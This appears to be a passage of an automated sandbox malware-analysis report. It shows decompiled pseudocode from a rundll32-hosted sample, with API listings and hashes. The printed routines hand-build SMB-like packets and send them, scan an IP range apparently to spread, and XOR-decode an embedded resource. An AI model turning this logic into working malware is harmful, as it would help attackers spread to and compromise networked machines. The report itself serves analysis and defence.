                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04E2943A), ref: 04E21ED2
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E21EDB
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04E2943A), ref: 04E21F1F
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E21F22
                                                                                                                                                              • htons.WS2_32(?), ref: 04E21F41
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E21FF1
                                                                                                                                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04E22008
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04E2943A), ref: 04E2202B
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E22032
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04E2943A), ref: 04E2203D
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E22044
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet$?????
                                                                                                                                                              • API String ID: 1780562090-3199473228
                                                                                                                                                              • Opcode ID: 4b9d5f20b024376a46e20e7c7659b4010debcaccea254549f39021371e0ad4a1
                                                                                                                                                              • Instruction ID: 2d5a3c81e75793a972f83c29d3ecdb865386bee774fb474ccf0efb8755996962
                                                                                                                                                              • Opcode Fuzzy Hash: 4b9d5f20b024376a46e20e7c7659b4010debcaccea254549f39021371e0ad4a1
                                                                                                                                                              • Instruction Fuzzy Hash: 915154369002569FEB218F68CD48EAA7BF4FF49305B088194ED84EB315DB35E909C790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                              			E04E21DD1(void* __ecx, intOrPtr _a4, void** _a8) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t20 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t20;
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					_t35 = HeapAlloc(GetProcessHeap(), 8, 0x2b);
                                                                                                                                                              					if(_t35 != 0) {
                                                                                                                                                              						_t38 = 9;
                                                                                                                                                              						_t27 = memcpy(_t35,  *_a8, _t38 << 2);
                                                                                                                                                              						__imp__#9(0x27);
                                                                                                                                                              						 *(_t35 + 2) = _t27;
                                                                                                                                                              						 *((char*)(_t35 + 8)) = 0x74;
                                                                                                                                                              						 *((short*)(_t35 + 0x24)) = 0xff02;
                                                                                                                                                              						 *((char*)(_t35 + 0x26)) = 0x42;
                                                                                                                                                              						 *((short*)(_t35 + 0x27)) = 0x4559;
                                                                                                                                                              						__imp__#19(_a4, _t35, 0x2b, 0); // executed
                                                                                                                                                              						if(0x4559 > 0) {
                                                                                                                                                              							_t47 = _v12;
                                                                                                                                                              							__imp__#16(_a4, _t47, 0xffff, 0); // executed
                                                                                                                                                              							if(0x4559 > 0 &&  *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                              								 *((short*)( *_a8 + 0x20)) = 0;
                                                                                                                                                              								memset(_t47, 0, 0xffff);
                                                                                                                                                              								_v5 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}










                                                                                                                                                              0x04e21de5
                                                                                                                                                              0x04e21df2
                                                                                                                                                              0x04e21df4
                                                                                                                                                              0x04e21df9
                                                                                                                                                              0x04e21e09
                                                                                                                                                              0x04e21e0d
                                                                                                                                                              0x04e21e1a
                                                                                                                                                              0x04e21e1f
                                                                                                                                                              0x04e21e21
                                                                                                                                                              0x04e21e2f
                                                                                                                                                              0x04e21e38
                                                                                                                                                              0x04e21e3c
                                                                                                                                                              0x04e21e42
                                                                                                                                                              0x04e21e46
                                                                                                                                                              0x04e21e4a
                                                                                                                                                              0x04e21e52
                                                                                                                                                              0x04e21e54
                                                                                                                                                              0x04e21e63
                                                                                                                                                              0x04e21e6b
                                                                                                                                                              0x04e21e7d
                                                                                                                                                              0x04e21e81
                                                                                                                                                              0x04e21e89
                                                                                                                                                              0x04e21e89
                                                                                                                                                              0x04e21e6b
                                                                                                                                                              0x04e21e97
                                                                                                                                                              0x04e21e97
                                                                                                                                                              0x04e21ea9
                                                                                                                                                              0x04e21eaf
                                                                                                                                                              0x04e21eb6

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21DE9
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21DF2
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21E04
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21E07
                                                                                                                                                              • htons.WS2_32(00000027), ref: 04E21E21
                                                                                                                                                              • send.WS2_32(?,00000000,0000002B,00000000), ref: 04E21E4A
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E21E63
                                                                                                                                                              • memset.MSVCRT ref: 04E21E81
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21E90
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21E97
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21EA2
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,04E254D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04E21EA9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 255267840-3175316637
                                                                                                                                                              • Opcode ID: 34e58010469846a24d81fe97c9bd57a12f529100e54186d3477e00f31f8efbc9
                                                                                                                                                              • Instruction ID: f0e641ec114b288a4d614f14f277019cca4f36cc4c2323cb0eb57ef9095bd92a
                                                                                                                                                              • Opcode Fuzzy Hash: 34e58010469846a24d81fe97c9bd57a12f529100e54186d3477e00f31f8efbc9
                                                                                                                                                              • Instruction Fuzzy Hash: F621D372600305BBEB205FA5CD49F6BBB68FF49705F154069FA049B290DBBAED04C764
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E22054(intOrPtr _a4, void* _a8, short* _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                              				long _t42;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                              				short _t51;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				char _t66;
                                                                                                                                                              				intOrPtr _t68;
                                                                                                                                                              				void* _t76;
                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                              				void* _t78;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t38 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v16 = _t38;
                                                                                                                                                              				if(_t38 == 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t40 = _a16;
                                                                                                                                                              				_t61 = _t40 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t68 =  *_t40;
                                                                                                                                                              					_t40 = _t40 + 1;
                                                                                                                                                              				} while (_t68 != 0);
                                                                                                                                                              				_t42 = _t40 - _t61 + 0x58;
                                                                                                                                                              				_v12 = _t42;
                                                                                                                                                              				_t59 = HeapAlloc(GetProcessHeap(), 8, _t42);
                                                                                                                                                              				if(_t59 == 0) {
                                                                                                                                                              					L13:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              					goto L14;
                                                                                                                                                              				}
                                                                                                                                                              				_t62 = 9;
                                                                                                                                                              				_t49 = memcpy(_t59, _a8, _t62 << 2);
                                                                                                                                                              				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                              				 *(_t59 + 2) = _t49;
                                                                                                                                                              				_t50 = _a16;
                                                                                                                                                              				 *((char*)(_t59 + 8)) = 0xa2;
                                                                                                                                                              				 *((short*)(_t59 + 0x24)) = 0xff18;
                                                                                                                                                              				_t76 = _t50 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t64 =  *_t50;
                                                                                                                                                              					_t50 = _t50 + 1;
                                                                                                                                                              				} while (_t64 != 0);
                                                                                                                                                              				_t51 = _t50 - _t76;
                                                                                                                                                              				_t77 = _a16;
                                                                                                                                                              				 *((short*)(_t59 + 0x2a)) = _t51;
                                                                                                                                                              				 *((short*)(_t59 + 0x55)) = _t51 + 1;
                                                                                                                                                              				_t18 = _t59 + 0x57; // 0x57
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x34)) = 0x2019f;
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x44)) = 3;
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x48)) = _a20;
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x4c)) = 0x40;
                                                                                                                                                              				 *((intOrPtr*)(_t59 + 0x50)) = 2;
                                                                                                                                                              				 *((char*)(_t59 + 0x54)) = 3;
                                                                                                                                                              				_t54 = _t18 - _t77;
                                                                                                                                                              				do {
                                                                                                                                                              					_t66 =  *_t77;
                                                                                                                                                              					 *((char*)(_t54 + _t77)) = _t66;
                                                                                                                                                              					_t77 = _t77 + 1;
                                                                                                                                                              				} while (_t66 != 0);
                                                                                                                                                              				__imp__#19(_a4, _t59, _v12, 0); // executed
                                                                                                                                                              				if(_t54 > 0) {
                                                                                                                                                              					_t78 = _v16;
                                                                                                                                                              					__imp__#16(_a4, _t78, 0xffff, 0); // executed
                                                                                                                                                              					if(_t54 > 0 &&  *((intOrPtr*)(_t78 + 9)) == 0) {
                                                                                                                                                              						 *_a12 =  *((intOrPtr*)(_t78 + 0x2a));
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t59);
                                                                                                                                                              				goto L13;
                                                                                                                                                              			}






















                                                                                                                                                              0x04e22069
                                                                                                                                                              0x04e22076
                                                                                                                                                              0x04e22078
                                                                                                                                                              0x04e2207d
                                                                                                                                                              0x04e22188
                                                                                                                                                              0x04e2218e
                                                                                                                                                              0x04e2218e
                                                                                                                                                              0x04e22083
                                                                                                                                                              0x04e22086
                                                                                                                                                              0x04e22089
                                                                                                                                                              0x04e22089
                                                                                                                                                              0x04e2208b
                                                                                                                                                              0x04e2208c
                                                                                                                                                              0x04e22093
                                                                                                                                                              0x04e22099
                                                                                                                                                              0x04e220a1
                                                                                                                                                              0x04e220a5
                                                                                                                                                              0x04e22175
                                                                                                                                                              0x04e22181
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22187
                                                                                                                                                              0x04e220b3
                                                                                                                                                              0x04e220ba
                                                                                                                                                              0x04e220bc
                                                                                                                                                              0x04e220c2
                                                                                                                                                              0x04e220c6
                                                                                                                                                              0x04e220c9
                                                                                                                                                              0x04e220cd
                                                                                                                                                              0x04e220d3
                                                                                                                                                              0x04e220d6
                                                                                                                                                              0x04e220d6
                                                                                                                                                              0x04e220d8
                                                                                                                                                              0x04e220d9
                                                                                                                                                              0x04e220e0
                                                                                                                                                              0x04e220e2
                                                                                                                                                              0x04e220e5
                                                                                                                                                              0x04e220ea
                                                                                                                                                              0x04e220ee
                                                                                                                                                              0x04e220f1
                                                                                                                                                              0x04e220f8
                                                                                                                                                              0x04e220ff
                                                                                                                                                              0x04e22106
                                                                                                                                                              0x04e22109
                                                                                                                                                              0x04e22110
                                                                                                                                                              0x04e22117
                                                                                                                                                              0x04e2211b
                                                                                                                                                              0x04e2211d
                                                                                                                                                              0x04e2211d
                                                                                                                                                              0x04e2211f
                                                                                                                                                              0x04e22122
                                                                                                                                                              0x04e22123
                                                                                                                                                              0x04e22131
                                                                                                                                                              0x04e22139
                                                                                                                                                              0x04e2213b
                                                                                                                                                              0x04e22148
                                                                                                                                                              0x04e22150
                                                                                                                                                              0x04e2215e
                                                                                                                                                              0x04e22161
                                                                                                                                                              0x04e22161
                                                                                                                                                              0x04e22150
                                                                                                                                                              0x04e2216f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04E2943A), ref: 04E2206D
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E22076
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04E2943A), ref: 04E2209C
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E2209F
                                                                                                                                                              • htons.WS2_32(?), ref: 04E220BC
                                                                                                                                                              • send.WS2_32(?,00000000,?,00000000), ref: 04E22131
                                                                                                                                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04E22148
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04E2943A), ref: 04E22168
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E2216F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04E2943A), ref: 04E2217A
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A), ref: 04E22181
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1780562090-3175316637
                                                                                                                                                              • Opcode ID: efc1d6ac8e35db1977a4eb17f977dd2ce1990cbaaf2a35c036b31a704d358307
                                                                                                                                                              • Instruction ID: f142af20389fc2bb04dfc1b858b34f6db08bad21d358a2658b9e1687ca0b526d
                                                                                                                                                              • Opcode Fuzzy Hash: efc1d6ac8e35db1977a4eb17f977dd2ce1990cbaaf2a35c036b31a704d358307
                                                                                                                                                              • Instruction Fuzzy Hash: C241D73550024AABDF118FA9DD48F9B3FB4EF49305F144198FA40AB245D775D809CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E04E28A6F(void* __ecx, void* _a4) {
                                                                                                                                                              				void* _v0;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				void _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				int _t11;
                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				void _t24;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                              				_t30 = GetSystemMetrics;
                                                                                                                                                              				_t11 = GetSystemMetrics(0x2000); // executed
                                                                                                                                                              				_t23 = Sleep;
                                                                                                                                                              				while(_t11 == 0) {
                                                                                                                                                              					Sleep(0x1f4); // executed
                                                                                                                                                              					_t11 = GetSystemMetrics(0x2000);
                                                                                                                                                              				}
                                                                                                                                                              				if(SetEvent(_a4) != 0) {
                                                                                                                                                              					Sleep(0x3e8);
                                                                                                                                                              				}
                                                                                                                                                              				E04E28A23();
                                                                                                                                                              				asm("int3");
                                                                                                                                                              				_push(_t27);
                                                                                                                                                              				_push(_t27);
                                                                                                                                                              				_push(_t23);
                                                                                                                                                              				_push(_t30);
                                                                                                                                                              				_t31 = _v12;
                                                                                                                                                              				_t24 =  *_t31;
                                                                                                                                                              				_t13 =  *((intOrPtr*)(_t31 + 4));
                                                                                                                                                              				_push(0x2000);
                                                                                                                                                              				_v24 = _t24;
                                                                                                                                                              				_v28 = _t13;
                                                                                                                                                              				if(_t24 < _t13) {
                                                                                                                                                              					_t29 = __imp__#14;
                                                                                                                                                              					do {
                                                                                                                                                              						_t17 = E04E2A567( *_t29(_t24)); // executed
                                                                                                                                                              						if(_t17 != 0) {
                                                                                                                                                              							__imp__#12( *_t29(_t24));
                                                                                                                                                              							_t26 = E04E2641A(_t18);
                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                              								E04E26B95(_t19, 0,  *((intOrPtr*)(_t31 + 8)));
                                                                                                                                                              								HeapFree(GetProcessHeap(), 0, _t26);
                                                                                                                                                              								_t31 = _v0;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t24 = _v12 + 1;
                                                                                                                                                              						_v12 = _t24;
                                                                                                                                                              					} while (_t24 < _v16);
                                                                                                                                                              				}
                                                                                                                                                              				LocalFree(_t31);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}



















                                                                                                                                                              0x04e28a6f
                                                                                                                                                              0x04e28a74
                                                                                                                                                              0x04e28a81
                                                                                                                                                              0x04e28a83
                                                                                                                                                              0x04e28a95
                                                                                                                                                              0x04e28a90
                                                                                                                                                              0x04e28a93
                                                                                                                                                              0x04e28a93
                                                                                                                                                              0x04e28aa4
                                                                                                                                                              0x04e28aab
                                                                                                                                                              0x04e28aab
                                                                                                                                                              0x04e28aad
                                                                                                                                                              0x04e28ab2
                                                                                                                                                              0x04e28ab6
                                                                                                                                                              0x04e28ab7
                                                                                                                                                              0x04e28ab8
                                                                                                                                                              0x04e28ab9
                                                                                                                                                              0x04e28aba
                                                                                                                                                              0x04e28abd
                                                                                                                                                              0x04e28abf
                                                                                                                                                              0x04e28ac2
                                                                                                                                                              0x04e28ac3
                                                                                                                                                              0x04e28ac6
                                                                                                                                                              0x04e28acb
                                                                                                                                                              0x04e28acd
                                                                                                                                                              0x04e28ad3
                                                                                                                                                              0x04e28ad7
                                                                                                                                                              0x04e28ade
                                                                                                                                                              0x04e28ae4
                                                                                                                                                              0x04e28af0
                                                                                                                                                              0x04e28af4
                                                                                                                                                              0x04e28afb
                                                                                                                                                              0x04e28b09
                                                                                                                                                              0x04e28b0f
                                                                                                                                                              0x04e28b0f
                                                                                                                                                              0x04e28af4
                                                                                                                                                              0x04e28b15
                                                                                                                                                              0x04e28b16
                                                                                                                                                              0x04e28b19
                                                                                                                                                              0x04e28ad3
                                                                                                                                                              0x04e28b1f
                                                                                                                                                              0x04e28b2b

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 04E28A81
                                                                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 04E28A90
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 04E28A93
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 04E28A9C
                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 04E28AAB
                                                                                                                                                              • htonl.WS2_32(74656490), ref: 04E28AD4
                                                                                                                                                              • htonl.WS2_32(74656490), ref: 04E28AE1
                                                                                                                                                              • inet_ntoa.WS2_32(00000000), ref: 04E28AE4
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04E28B02
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E28B09
                                                                                                                                                              • LocalFree.KERNEL32(?,00002000,76B62D10,74656490), ref: 04E28B1F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 4223591894-3175316637
                                                                                                                                                              • Opcode ID: c565814ef3f20d3b2aebcc7407c3efebb792ff95f4b75f2d48ed2fef4dc8f305
                                                                                                                                                              • Instruction ID: ac3b42a16ac14f0916af2d1906023500f91f94a3e3aef720255ed49a7870669b
                                                                                                                                                              • Opcode Fuzzy Hash: c565814ef3f20d3b2aebcc7407c3efebb792ff95f4b75f2d48ed2fef4dc8f305
                                                                                                                                                              • Instruction Fuzzy Hash: 69118EB2A00329BBE711AFB6CE88D5F77ACFF493457045525F601A3100DA79FD018A70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E28313(signed int __eax, void _a4, void* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				long _t23;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				int _t27;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t32;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				void** _t39;
                                                                                                                                                              				long _t46;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				struct HRSRC__* _t50;
                                                                                                                                                              
                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                              				_t50 = FindResourceW( *0x4e37b98, __eax & 0x0000ffff, 6);
                                                                                                                                                              				if(_t50 == 0) {
                                                                                                                                                              					L17:
                                                                                                                                                              					return _v12;
                                                                                                                                                              				}
                                                                                                                                                              				_t21 = LoadResource( *0x4e37b98, _t50);
                                                                                                                                                              				if(_t21 == 0) {
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				_t22 = LockResource(_t21);
                                                                                                                                                              				_v16 = _t22;
                                                                                                                                                              				if(_t22 == 0) {
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				_t23 = SizeofResource( *0x4e37b98, _t50);
                                                                                                                                                              				_v8 = _t23;
                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				_t25 = RtlAllocateHeap(GetProcessHeap(), 0, _t23); // executed
                                                                                                                                                              				_t48 = _t25;
                                                                                                                                                              				if(_t48 == 0) {
                                                                                                                                                              					L16:
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				memcpy(_t48, _v16, _v8);
                                                                                                                                                              				_t27 = _v8;
                                                                                                                                                              				if(_t27 == 0) {
                                                                                                                                                              					L9:
                                                                                                                                                              					_t29 = RtlAllocateHeap(GetProcessHeap(), 8,  *_t48); // executed
                                                                                                                                                              					_t39 = _a4;
                                                                                                                                                              					 *_t39 = _t29;
                                                                                                                                                              					if(_t29 != 0) {
                                                                                                                                                              						_a4 =  *_t48;
                                                                                                                                                              						_t11 = _t48 + 4; // 0x4
                                                                                                                                                              						_t32 = E04E2A790(_t29,  &_a4, _t11, _v8 + 0xfffffffc); // executed
                                                                                                                                                              						if(_t32 != 0) {
                                                                                                                                                              							HeapFree(GetProcessHeap(), 0,  *_t39);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t35 = _a8;
                                                                                                                                                              							if(_t35 != 0) {
                                                                                                                                                              								 *_t35 = _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v12 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					RtlFreeHeap(GetProcessHeap(), 0, _t48); // executed
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				_t46 =  *_t48;
                                                                                                                                                              				do {
                                                                                                                                                              					_t46 = _t46 ^ 0x000000e9;
                                                                                                                                                              					_t27 = _t27 - 1;
                                                                                                                                                              				} while (_t27 != 0);
                                                                                                                                                              				 *_t48 = _t46;
                                                                                                                                                              				goto L9;
                                                                                                                                                              			}


















                                                                                                                                                              0x04e28319
                                                                                                                                                              0x04e28330
                                                                                                                                                              0x04e28334
                                                                                                                                                              0x04e28415
                                                                                                                                                              0x04e2841a
                                                                                                                                                              0x04e2841a
                                                                                                                                                              0x04e28341
                                                                                                                                                              0x04e28349
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28350
                                                                                                                                                              0x04e28356
                                                                                                                                                              0x04e2835b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28368
                                                                                                                                                              0x04e2836e
                                                                                                                                                              0x04e28373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2838d
                                                                                                                                                              0x04e2838f
                                                                                                                                                              0x04e28393
                                                                                                                                                              0x04e28413
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28414
                                                                                                                                                              0x04e2839c
                                                                                                                                                              0x04e283a1
                                                                                                                                                              0x04e283a9
